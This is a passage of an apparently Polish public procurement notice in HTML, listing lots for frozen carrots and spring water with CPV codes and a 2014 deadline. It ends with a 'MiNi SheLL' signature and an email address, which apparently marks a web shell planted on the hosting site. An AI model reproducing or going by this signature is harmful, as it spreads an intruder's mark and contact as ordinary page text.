Marchewka  mrożona ,krojona w kostkę - op. 450g.	szt.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WODA ŹRÓDLANA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana nie gazowana  - niskomineralizowana  z dozownikiem w butelkach o pojemności   18 l.	
litry	
     2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com